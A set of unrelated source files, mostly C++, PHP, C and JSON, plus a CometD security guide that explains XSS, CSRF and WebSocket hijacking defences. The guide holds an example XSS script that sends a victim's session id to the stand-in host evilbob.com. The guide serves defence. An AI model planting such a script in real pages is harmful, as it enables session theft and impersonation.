// Preprocessor vertical repetition code
//
///////////////////////////////////////////////////////////////////////////////
#define N BOOST_PP_ITERATION()
namespace result_of
{
template <BOOST_PP_ENUM_PARAMS(N, typename T)>
#define TEXT(z, n, text) , text
struct make_set< BOOST_PP_ENUM_PARAMS(N, T) BOOST_PP_REPEAT_FROM_TO(BOOST_PP_DEC(N), FUSION_MAX_SET_SIZE, TEXT, void_) >
#undef TEXT
{
typedef set<BOOST_PP_ENUM(N, BOOST_FUSION_AS_FUSION_ELEMENT, _)> type;
};
}
template <BOOST_PP_ENUM_PARAMS(N, typename T)>
BOOST_CONSTEXPR BOOST_FUSION_GPU_ENABLED
inline set<BOOST_PP_ENUM(N, BOOST_FUSION_AS_FUSION_ELEMENT, _)>
make_set(BOOST_PP_ENUM_BINARY_PARAMS(N, T, const& arg))
{
return set<BOOST_PP_ENUM(N, BOOST_FUSION_AS_FUSION_ELEMENT, _)>(
BOOST_PP_ENUM_PARAMS(N, arg));
}
#undef N
#endif // defined(BOOST_PP_IS_ITERATING)
[[_security]]
== Security
This section discusses the security features of the Bayeux Protocol, their
relationship with common attacks, and how you can configure CometD to harden
your application.
=== Security of the CometD session id
The Bayeux Protocol identifies a particular session (formerly known as "client")
via a session id token, carried in Bayeux messages by the `clientId` field.
The `clientId` field value (i.e. the session id) is generated by the server
when the client sends the handshake request message, and sent back to the
client in the handshake response message (see
xref:_bayeux_meta_handshake[the Bayeux Protocol handshake]).
The client then sends the `clientId` field in every subsequent message to the
server, until disconnection.
The session id is generated using a strong random number generator, and as
such it is not guessable by an evil third party.
An evil user that knows its own session id cannot guess the session id of
another user by just looking at its own session id.
While the non-guessability of the session id is a good starting point, it
is typically not enough, so read on.
=== Security against man-in-the-middle attacks
An evil user may be in a position to observe Bayeux Protocol traffic, as
it is the case for a man-in-the-middle.
The typical solution in this case is to encrypt the traffic between the
client and the server using TLS.
In this way, all the traffic between the client and the server is
encrypted end-to-end and a man-in-the-middle cannot see or otherwise retrieve
someone else's session id.
[[_security_xss]]
=== Security against Cross-Site Scripting (XSS) attacks
A https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)[cross-site scripting attack]
is a particularly important vulnerability of web applications.
A typical example of XSS is the following:
Evil user Bob connects to a chat service that uses CometD.
There, he finds Alice, another user.
Bob sends an evil chat message text to Alice where the text is the following:
====
[source,html]
----
<script type="text/javascript">
var xhr = new XMLHttpRequest();
xhr.open("GET", "https://evilbob.com?stolen=" + $.cometd.getClientId());
xhr.send();
</script>
----
====
As you can see, the script accesses the CometD's session id (via
`$.cometd.getClientId()`).
[NOTE]
====
Removing the method `getClientId()` would not solve the issue, because
the evil script could access the session id in other ways.
For example, by registering an extension, or by otherwise watching
Bayeux messages that come and go for the normal functioning of the
application, or by quickly disconnecting and reconnecting the session, etc.
====
Bob sends that evil message, which reaches the CometD server and gets routed
to Alice. When it arrives on Alice's browser, that script may be run by
the browser if the application is XSS vulnerable.
If the script runs, Bob would be able to steal Alice's session id, send
it to his server `evilbob.com`, where Bob would be able to access it.
[IMPORTANT]
====
If your web application is XSS vulnerable, an attacker can do
a lot more damage than just stealing a CometD session id, so it is of
paramount importance that your web application sanitizes data received
from unknown sources such as other users' chat messages.
====
If Bob has stolen Alice's session id, he could craft a Bayeux message
with Alice's session id and send it from his computer, and thereby could
impersonate Alice.
CometD protects from impersonations due to stolen session ids in different
ways, depending on the type of transport used to carry Bayeux messages.
For transports based on HTTP (`long-polling` and `callback-polling`),
CometD sends an HTTP cookie with the handshake response, marked as `HttpOnly`,
called `BAYEUX_BROWSER` (see xref:_java_server_configuration[]).
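For illustration, the handshake response that sets this cookie looks,
schematically, like the following (the cookie value is opaque and
server-generated, and the exact attributes depend on your configuration):

====
[source]
----
HTTP/1.1 200 OK
Content-Type: application/json
Set-Cookie: BAYEUX_BROWSER=5t7a...; Path=/cometd; HttpOnly
----
====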
The CometD implementation, on the server, maps this cookie to a legit
session id during the processing of the handshake request message.
For every subsequent message, the browser will send the `BAYEUX_BROWSER`
cookie to the server and the CometD implementation will
retrieve the session id from legit sessions that have been mapped to the
cookie, rather than from the message (where it could have been altered).
Bob could craft a message with Alice's session id, but the `BAYEUX_BROWSER`
cookie that he will send along with the tampered message will be his,
not Alice's. The CometD implementation will detect this attack and ask
Bob to re-handshake.
If the crafted message does not have any cookie, CometD will ask Bob to
re-handshake.
For transports based on WebSocket (`websocket`), CometD trusts the particular
connection that has been established during the handshake.
The session id is associated with that connection, and when a WebSocket message
arrives on that connection, CometD retrieves the session id from the
association with the connection, rather than from the message (where it
could have been altered).
When the connection is closed, for example for a network failure, CometD
attempts to open another connection.
If the reconnection happens within a short period of time (typically less than
the `maxInterval` configured on the server), then CometD will try to send
messages on the new connection without re-handshaking, but since it's a new
connection that did not process a handshake message, it will not have a
session id associated.
At this point, CometD could ask the client to re-handshake (which involves
some round-trips to be completed, possibly slowing further down the
communication in case of faulty networks), or it could trust the session
id from the message (which would yield faster reconnections, albeit less
secure if the session id is stolen).
This is controlled by the `requireHandshakePerConnection` parameter, see
xref:_java_server_configuration[].
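
As a sketch (the parameter and servlet class names below are those of recent
CometD versions; adjust them for your setup), the stricter behavior can be
enabled with an init parameter on the CometD servlet in `web.xml`:

====
[source,xml]
----
<servlet>
  <servlet-name>cometd</servlet-name>
  <servlet-class>org.cometd.server.CometDServlet</servlet-class>
  <init-param>
    <param-name>ws.requireHandshakePerConnection</param-name>
    <param-value>true</param-value>
  </init-param>
</servlet>
----
====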
[[_security_csrf]]
=== Security against Cross Site Request Forgery (CSRF) attacks
A https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)[cross site request forgery attack]
is a particularly important vulnerability of web applications.
A typical example of CSRF is the following:
Evil user Bob connects to the chat service at `cometd-chat.com` using CometD. There,
he finds Alice, another user. Bob sends an evil chat message text to Alice where the
text is the following:
====
[source,html]
----
Look at this: https://evilbob.com/cometd
----
====
Alice clicks on the link, her browser opens a new tab to `+https://evilbob.com/cometd+`
and an entertaining HTML page containing a script is downloaded to Alice's browser.
While Alice is looking at Bob's entertaining page, her browser runs an evil script,
which may perform actions on behalf of Alice on the chat service that uses CometD.
For example, Bob could use xref:_security_xss[XSS] to steal Alice's session id and
then craft and send evil messages to the chat service _from Alice's browser_.
Alice's browser will send the existing Alice's `BAYEUX_BROWSER` cookie along with
the evil messages, and to the server the evil messages will be indistinguishable
from legit messages sent by Alice, because they will carry her `BAYEUX_BROWSER`
cookie and her stolen session id.
CometD does not automatically protect against CSRF attacks, but they are easily
countered by configuring the cross-origin filter as explained in
xref:_java_server_configuration_advanced[this section].
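
For example, using Jetty's cross-origin filter (the class name and parameter
shown are those of recent Jetty versions; adjust them for yours), the
application at `cometd-chat.com` could restrict the allowed origin like this:

====
[source,xml]
----
<filter>
  <filter-name>cross-origin</filter-name>
  <filter-class>org.eclipse.jetty.servlets.CrossOriginFilter</filter-class>
  <init-param>
    <param-name>allowedOrigins</param-name>
    <param-value>https://cometd-chat.com</param-value>
  </init-param>
</filter>
<filter-mapping>
  <filter-name>cross-origin</filter-name>
  <url-pattern>/cometd/*</url-pattern>
</filter-mapping>
----
====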
Alice's legit messages are sent by a script downloaded from the chat service, and
therefore will have the following HTTP header:
====
[source]
----
Origin: https://cometd-chat.com
----
====
Conversely, Bob's evil script is downloaded from `+https://evilbob.com+` and his
evil messages will have the following HTTP header:
====
[source]
----
Origin: https://evilbob.com
----
====
The application at `cometd-chat.com` can install the cross-origin filter and
configure it to allow requests only from the `cometd-chat.com` origin,
effectively blocking Bob's CSRF attack.
This works because browsers are required to perform a _preflight_ request
before sending an HTTP request to a different target origin.
The preflight request will be intercepted by the cross-origin filter and
denied.
The unsuccessful preflight response instructs the browser that the script
cannot perform any request to that target origin, and the browser will
block the script from making requests to the target domain.
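As an illustration, a minimal sketch of such a cross-origin filter configuration
for Jetty's `CrossOriginFilter` might look like the following. The filter name,
URL pattern, and `allowedOrigins` value are assumptions for this example, not a
configuration shipped with CometD:

====
[source,xml]
----
<!-- Hypothetical web.xml fragment: allow only the chat service's own origin. -->
<filter>
    <filter-name>cross-origin</filter-name>
    <filter-class>org.eclipse.jetty.servlets.CrossOriginFilter</filter-class>
    <init-param>
        <param-name>allowedOrigins</param-name>
        <param-value>https://cometd-chat.com</param-value>
    </init-param>
</filter>
<filter-mapping>
    <filter-name>cross-origin</filter-name>
    <url-pattern>/cometd/*</url-pattern>
</filter-mapping>
----
====

With this configuration, requests whose `Origin` header is not
`+https://cometd-chat.com+` fail the preflight and are rejected.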
[[_security_cswsh]]
=== Security against Cross-Site WebSocket Hijacking (CSWSH) attacks
Cross-Site WebSocket Hijacking (CSWSH) is a variant of
xref:_security_csrf[Cross-Site Request Forgery] but for the WebSocket protocol.
Similarly to CSRF, Bob tricks Alice to look at a page at
`+https://evilbob.com/cometd+` that downloads an evil script that opens a
WebSocket connection to `+https://cometd-chat.com+` _from Alice's browser_.
A WebSocket connection sends an initial HTTP request to the server.
This initial HTTP request, triggered by Bob's evil script running in Alice's
browser, looks like this:
====
[source]
----
GET /cometd HTTP/1.1
Upgrade: websocket
...
Cookie: BAYEUX_BROWSER=...; JSESSIONID=...
...
Origin: https://evilbob.com
----
====
The initial HTTP request will have Alice's cookies (and possibly Alice's
authentication headers), including the CometD cookie and the HTTP session
cookie.
However, it will have `+Origin: https://evilbob.com+` and not the expected
`+Origin: https://cometd-chat.com+`.
As with the CSRF attack, the application at `cometd-chat.com` can install the
cross-origin filter and configure it to allow requests only from the
`cometd-chat.com` origin, effectively blocking Bob's CSWSH attack.
In this case, the cross-origin filter must be installed _before_ the
WebSocket upgrade mechanism takes place, or the WebSocket upgrade mechanism
must have a way to test against a configured list of allowed origins and
reject the WebSocket connection attempt if the origin is not allowed.
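For WebSocket upgrades specifically, an origin check of this kind can be
expressed with the standard `javax.websocket` API, whose
`ServerEndpointConfig.Configurator.checkOrigin(String)` hook is invoked during
the handshake. The sketch below is an illustration under stated assumptions
(the class name and the allowed origin are invented for this example); it is
not CometD's own implementation:

====
[source,java]
----
import javax.websocket.server.ServerEndpointConfig;

// Hypothetical configurator: reject the WebSocket upgrade unless the
// Origin header matches the chat service's origin exactly.
public class ChatOriginConfigurator extends ServerEndpointConfig.Configurator {
    private static final String ALLOWED_ORIGIN = "https://cometd-chat.com";

    @Override
    public boolean checkOrigin(String originHeaderValue) {
        return ALLOWED_ORIGIN.equals(originHeaderValue);
    }
}
----
====

Returning `false` from `checkOrigin()` makes the container refuse the upgrade,
so Bob's evil script never obtains a WebSocket connection from Alice's browser.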
| {
"pile_set_name": "Github"
} |
<?php
/**
* Copyright © Magento, Inc. All rights reserved.
* See COPYING.txt for license details.
*/
namespace Magento\Customer\Test\Unit\Model\Address\Config;
class ReaderTest extends \PHPUnit\Framework\TestCase
{
/**
* @var \Magento\Customer\Model\Address\Config\Reader
*/
protected $_model;
/**
* @var \Magento\Framework\Config\FileResolverInterface|\PHPUnit_Framework_MockObject_MockObject
*/
protected $_fileResolverMock;
/**
* @var \Magento\Customer\Model\Address\Config\Converter|\PHPUnit_Framework_MockObject_MockObject
*/
protected $_converter;
/**
* @var \Magento\Customer\Model\Address\Config\SchemaLocator
*/
protected $_schemaLocator;
/**
* @var \Magento\Framework\Config\ValidationStateInterface|\PHPUnit_Framework_MockObject_MockObject
*/
protected $_validationState;
protected function setUp()
{
$this->_fileResolverMock = $this->createMock(\Magento\Framework\Config\FileResolverInterface::class);
$this->_fileResolverMock->expects(
$this->once()
)->method(
'get'
)->with(
'address_formats.xml',
'scope'
)->will(
$this->returnValue(
[
file_get_contents(__DIR__ . '/_files/formats_one.xml'),
file_get_contents(__DIR__ . '/_files/formats_two.xml'),
]
)
);
$this->_converter = $this->createPartialMock(
\Magento\Customer\Model\Address\Config\Converter::class,
['convert']
);
$moduleReader = $this->createPartialMock(\Magento\Framework\Module\Dir\Reader::class, ['getModuleDir']);
$moduleReader->expects(
$this->once()
)->method(
'getModuleDir'
)->with(
'etc',
'Magento_Customer'
)->will(
$this->returnValue('stub')
);
$this->_schemaLocator = new \Magento\Customer\Model\Address\Config\SchemaLocator($moduleReader);
$this->_validationState = $this->createMock(\Magento\Framework\Config\ValidationStateInterface::class);
$this->_validationState->expects($this->any())
->method('isValidationRequired')
->willReturn(false);
$this->_model = new \Magento\Customer\Model\Address\Config\Reader(
$this->_fileResolverMock,
$this->_converter,
$this->_schemaLocator,
$this->_validationState
);
}
public function testRead()
{
$expectedResult = new \stdClass();
$constraint = function (\DOMDocument $actual) {
try {
$expected = __DIR__ . '/_files/formats_merged.xml';
\PHPUnit\Framework\Assert::assertXmlStringEqualsXmlFile($expected, $actual->saveXML());
return true;
} catch (\PHPUnit\Framework\AssertionFailedError $e) {
return false;
}
};
$this->_converter->expects(
$this->once()
)->method(
'convert'
)->with(
$this->callback($constraint)
)->will(
$this->returnValue($expectedResult)
);
$this->assertSame($expectedResult, $this->_model->read('scope'));
}
}
| {
"pile_set_name": "Github"
} |
/*=============================================================================
Copyright (c) 2001-2011 Joel de Guzman
Copyright (c) 2001-2011 Hartmut Kaiser
Distributed under the Boost Software License, Version 1.0. (See accompanying
file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
=============================================================================*/
#if !defined(SPIRIT_SEQUENCE_APR_22_2006_0811AM)
#define SPIRIT_SEQUENCE_APR_22_2006_0811AM
#if defined(_MSC_VER)
#pragma once
#endif
#include <boost/spirit/home/qi/operator/sequence_base.hpp>
#include <boost/spirit/home/qi/detail/fail_function.hpp>
#include <boost/spirit/home/qi/meta_compiler.hpp>
namespace boost { namespace spirit
{
///////////////////////////////////////////////////////////////////////////
// Enablers
///////////////////////////////////////////////////////////////////////////
template <>
struct use_operator<qi::domain, proto::tag::shift_right> // enables >>
: mpl::true_ {};
template <>
struct flatten_tree<qi::domain, proto::tag::shift_right> // flattens >>
: mpl::true_ {};
}}
namespace boost { namespace spirit { namespace qi
{
template <typename Elements>
struct sequence : sequence_base<sequence<Elements>, Elements>
{
friend struct sequence_base<sequence<Elements>, Elements>;
sequence(Elements const& elements)
: sequence_base<sequence<Elements>, Elements>(elements) {}
private:
template <typename Iterator, typename Context, typename Skipper>
static detail::fail_function<Iterator, Context, Skipper>
fail_function(
Iterator& first, Iterator const& last
, Context& context, Skipper const& skipper)
{
return detail::fail_function<Iterator, Context, Skipper>
(first, last, context, skipper);
}
std::string id() const { return "sequence"; }
};
///////////////////////////////////////////////////////////////////////////
// Parser generators: make_xxx function (objects)
///////////////////////////////////////////////////////////////////////////
template <typename Elements, typename Modifiers>
struct make_composite<proto::tag::shift_right, Elements, Modifiers>
: make_nary_composite<Elements, sequence>
{};
// ///////////////////////////////////////////////////////////////////////////
// // Define what attributes are compatible with a sequence
// template <typename Attribute, typename Elements, typename Context, typename Iterator>
// struct is_attribute_compatible<Attribute, sequence<Elements>, Context, Iterator>
// : mpl::or_<
// is_convertible<Attribute
// , typename traits::attribute_of<sequence<Elements>, Context, Iterator>::type>
// , traits::is_fusion_sequence_compatible<qi::domain, Attribute
// , sequence<Elements>, Context, Iterator>
// , traits::is_container_compatible<qi::domain, Attribute
// , sequence<Elements>, Context, Iterator>
// >
// {};
}}}
namespace boost { namespace spirit { namespace traits
{
///////////////////////////////////////////////////////////////////////////
template <typename Elements>
struct has_semantic_action<qi::sequence<Elements> >
: nary_has_semantic_action<Elements> {};
///////////////////////////////////////////////////////////////////////////
template <typename Elements, typename Attribute, typename Context
, typename Iterator>
struct handles_container<qi::sequence<Elements>, Attribute, Context
, Iterator>
: mpl::true_ {};
}}}
#endif
| {
"pile_set_name": "Github"
} |
# Acknowledgements
This application makes use of the following third party libraries:
## WHUCalendar
Copyright (c) 2016 tiger8888 <seekarmor@139.com>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
Generated by CocoaPods - https://cocoapods.org
| {
"pile_set_name": "Github"
} |
// Distributed under the terms of the MIT license
// Test case submitted to project by https://github.com/practicalswift (practicalswift)
// Test case found by fuzzing
class A{class d<T where f:A{var b{typealias e=a.c | {
"pile_set_name": "Github"
} |
/* SPDX-License-Identifier: GPL-2.0 */
/*
* From coreboot file of same name
*
* Copyright (C) 2014 Google, Inc
*/
#ifndef _ARCH_ASM_LAPIC_H
#define _ARCH_ASM_LAPIC_H
#define LAPIC_DEFAULT_BASE 0xfee00000
#define LAPIC_ID 0x020
#define LAPIC_LVR 0x030
#define LAPIC_TASKPRI 0x080
#define LAPIC_TPRI_MASK 0xff
#define LAPIC_RRR 0x0c0
#define LAPIC_SPIV 0x0f0
#define LAPIC_SPIV_ENABLE 0x100
#define LAPIC_ICR 0x300
#define LAPIC_DEST_SELF 0x40000
#define LAPIC_DEST_ALLINC 0x80000
#define LAPIC_DEST_ALLBUT 0xc0000
#define LAPIC_ICR_RR_MASK 0x30000
#define LAPIC_ICR_RR_INVALID 0x00000
#define LAPIC_ICR_RR_INPROG 0x10000
#define LAPIC_ICR_RR_VALID 0x20000
#define LAPIC_INT_LEVELTRIG 0x08000
#define LAPIC_INT_ASSERT 0x04000
#define LAPIC_ICR_BUSY 0x01000
#define LAPIC_DEST_LOGICAL 0x00800
#define LAPIC_DM_FIXED 0x00000
#define LAPIC_DM_LOWEST 0x00100
#define LAPIC_DM_SMI 0x00200
#define LAPIC_DM_REMRD 0x00300
#define LAPIC_DM_NMI 0x00400
#define LAPIC_DM_INIT 0x00500
#define LAPIC_DM_STARTUP 0x00600
#define LAPIC_DM_EXTINT 0x00700
#define LAPIC_VECTOR_MASK 0x000ff
#define LAPIC_ICR2 0x310
#define GET_LAPIC_DEST_FIELD(x) (((x) >> 24) & 0xff)
#define SET_LAPIC_DEST_FIELD(x) ((x) << 24)
#define LAPIC_LVT0 0x350
#define LAPIC_LVT1 0x360
#define LAPIC_LVT_MASKED (1 << 16)
#define LAPIC_LVT_LEVEL_TRIGGER (1 << 15)
#define LAPIC_LVT_REMOTE_IRR (1 << 14)
#define LAPIC_INPUT_POLARITY (1 << 13)
#define LAPIC_SEND_PENDING (1 << 12)
#define LAPIC_LVT_RESERVED_1 (1 << 11)
#define LAPIC_DELIVERY_MODE_MASK (7 << 8)
#define LAPIC_DELIVERY_MODE_FIXED (0 << 8)
#define LAPIC_DELIVERY_MODE_NMI (4 << 8)
#define LAPIC_DELIVERY_MODE_EXTINT (7 << 8)
unsigned long lapic_read(unsigned long reg);
void lapic_write(unsigned long reg, unsigned long v);
void enable_lapic(void);
void disable_lapic(void);
unsigned long lapicid(void);
int lapic_remote_read(int apicid, int reg, unsigned long *pvalue);
void lapic_setup(void);
#endif
| {
"pile_set_name": "Github"
} |
import {barFraction, barEnd} from "../constants";
// Compute the fractional width of a single bar when `array.length` bars
// share the available space, with a gap of `barEnd` between adjacent bars.
export default function barWidth(array) {
const n = array.length;
if (n === 0) return 0;
if (n === 1) return barFraction;
return (barFraction - barEnd * (n - 1)) / n;
}
| {
"pile_set_name": "Github"
} |
{
"kind": "FUNCTION_DEFINITION",
"children": [
{
"kind": "LIST",
"children": []
},
{
"kind": "FUNCTION_KEYWORD",
"trailingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
]
},
{
"kind": "IDENTIFIER_TOKEN",
"value": "foo"
},
{
"kind": "FUNCTION_SIGNATURE",
"children": [
{
"kind": "OPEN_PAREN_TOKEN"
},
{
"kind": "LIST",
"children": []
},
{
"kind": "CLOSE_PAREN_TOKEN",
"trailingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
]
}
]
},
{
"kind": "FUNCTION_BODY_BLOCK",
"children": [
{
"kind": "OPEN_BRACE_TOKEN",
"trailingMinutiae": [
{
"kind": "END_OF_LINE_MINUTIAE",
"value": "\n"
}
]
},
{
"kind": "LIST",
"children": [
{
"kind": "ASSIGNMENT_STATEMENT",
"children": [
{
"kind": "SIMPLE_NAME_REFERENCE",
"children": [
{
"kind": "IDENTIFIER_TOKEN",
"value": "a",
"leadingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
},
{
"kind": "COMMENT_MINUTIAE",
"value": "// DecimalNumber FloatingPointTypeSuffix"
},
{
"kind": "END_OF_LINE_MINUTIAE",
"value": "\n"
},
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
],
"trailingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
]
}
]
},
{
"kind": "EQUAL_TOKEN",
"trailingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
]
},
{
"kind": "NUMERIC_LITERAL",
"children": [
{
"kind": "DECIMAL_FLOATING_POINT_LITERAL_TOKEN",
"value": "25f"
}
]
},
{
"kind": "SEMICOLON_TOKEN",
"trailingMinutiae": [
{
"kind": "END_OF_LINE_MINUTIAE",
"value": "\n"
}
]
}
]
},
{
"kind": "ASSIGNMENT_STATEMENT",
"children": [
{
"kind": "SIMPLE_NAME_REFERENCE",
"children": [
{
"kind": "IDENTIFIER_TOKEN",
"value": "a",
"leadingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
],
"trailingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
]
}
]
},
{
"kind": "EQUAL_TOKEN",
"trailingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
]
},
{
"kind": "NUMERIC_LITERAL",
"children": [
{
"kind": "DECIMAL_FLOATING_POINT_LITERAL_TOKEN",
"value": "25F"
}
]
},
{
"kind": "SEMICOLON_TOKEN",
"trailingMinutiae": [
{
"kind": "END_OF_LINE_MINUTIAE",
"value": "\n"
}
]
}
]
},
{
"kind": "ASSIGNMENT_STATEMENT",
"children": [
{
"kind": "SIMPLE_NAME_REFERENCE",
"children": [
{
"kind": "IDENTIFIER_TOKEN",
"value": "a",
"leadingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
],
"trailingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
]
}
]
},
{
"kind": "EQUAL_TOKEN",
"trailingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
]
},
{
"kind": "NUMERIC_LITERAL",
"children": [
{
"kind": "DECIMAL_FLOATING_POINT_LITERAL_TOKEN",
"value": "25d"
}
]
},
{
"kind": "SEMICOLON_TOKEN",
"trailingMinutiae": [
{
"kind": "END_OF_LINE_MINUTIAE",
"value": "\n"
}
]
}
]
},
{
"kind": "ASSIGNMENT_STATEMENT",
"children": [
{
"kind": "SIMPLE_NAME_REFERENCE",
"children": [
{
"kind": "IDENTIFIER_TOKEN",
"value": "a",
"leadingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
],
"trailingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
]
}
]
},
{
"kind": "EQUAL_TOKEN",
"trailingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
]
},
{
"kind": "NUMERIC_LITERAL",
"children": [
{
"kind": "DECIMAL_FLOATING_POINT_LITERAL_TOKEN",
"value": "25D"
}
]
},
{
"kind": "SEMICOLON_TOKEN",
"trailingMinutiae": [
{
"kind": "END_OF_LINE_MINUTIAE",
"value": "\n"
}
]
}
]
}
]
},
{
"kind": "CLOSE_BRACE_TOKEN",
"trailingMinutiae": [
{
"kind": "END_OF_LINE_MINUTIAE",
"value": "\n"
}
]
}
]
}
]
}
| {
"pile_set_name": "Github"
} |